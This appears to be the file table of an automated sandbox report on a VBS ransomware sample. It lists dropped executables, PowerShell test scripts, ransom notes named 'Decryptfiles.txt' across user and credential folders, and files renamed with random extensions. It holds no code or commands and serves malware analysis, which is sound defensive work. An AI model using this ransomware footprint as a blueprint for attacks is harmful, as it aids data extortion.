Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
NOTIFICATION_OF_DEPENDANTS_1.vbs
|
ASCII text
|
initial sample
|
||
C:\Users\Public\AccountPictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Documents\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Downloads\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Libraries\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Libraries\RecordedTV.library-ms
|
data
|
modified
|
||
C:\Users\Public\Music\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Pictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Videos\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\.curlrc.SuMh
|
data
|
dropped
|
||
C:\Users\user\.ms-ad\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\3D Objects\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10rclwu2.hdm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3iigs5yg.am1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nxkjeth.jqb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aakjs4su.ynx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5gy5d2y.w0s.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ce5tmog3.w5r.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmijsyeu.ejv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czjtfiqo.ezw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dd4cmrln.ljv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_muq24lzp.1ro.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmgfecbn.m42.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wt0cmllf.f1b.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y25lwppa.tsg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdqsw1gs.ytr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\fjeljies.cpl
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\.curlrc.echn
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\Preflight Acrobat Continuous\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\CRLogs\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\CRLogs\crashlogs\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Flash Player\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Headlights\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Linguistics\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\LogTransport2CC\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\LogTransport2\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\RTTransfer\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Sonar\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Sonar\SonarCC\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\AddIns\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Credentials\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Excel\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk.XxpC
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Network\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\0837c0eb-5e12-485a-b8a4-e50f73c1d92b
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Speech\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Spelling\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead.bEiR
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Vault\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\AccountPictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\CloudStore\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent Items\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AQRFEVRTGL.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BQJUWOYRTO.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BWETZDQDIB.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HQJBRDYKDE.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTQYAMNJFK.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYEPUIQXSK.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYEPUIQXSK.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.mp3
|
byte-swapped Berkeley vfont data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.pdf
|
DOS executable (COM, 0x8C-variant)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.pdf.Targ (copy)
|
DOS executable (COM, 0x8C-variant)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NFUBSOKSVH.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NRIABABLWZ.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWZOQIFCAN.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UJDGSZVRAQ.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UNKRLCVOHV.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VEPKBVANJO.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget.mHle
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink.BxTm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Documents.mydocs.hcyU
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail.vgZW
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Extensions\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\AlternateServices.txt
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\SiteSecurityServiceState.txt
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\compatibility.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\containers.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal.FoaS
|
DOS executable (COM, 0x8C-variant)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690337.3be89113-af2b-4b48-9c47-40ac1156f7a2.new-profile.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690340.2824c836-2afd-4a95-940b-ed2b991ba55d.event.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690344.6260e81e-5ef5-4137-a0a5-7930ea6f0a75.main.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690347.6786f292-c1be-4996-99cd-77aa855c1844.first-shutdown.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695562.2c8e5eea-375d-48a9-ad4c-be583ff1215d.health.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695606.ff032c8b-05e6-43c9-9e84-732dbe7aca27.event.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695610.18a05d94-e006-440f-b702-3e398a280dbf.health.jsonlz4
|
data
|
dropped
|
||
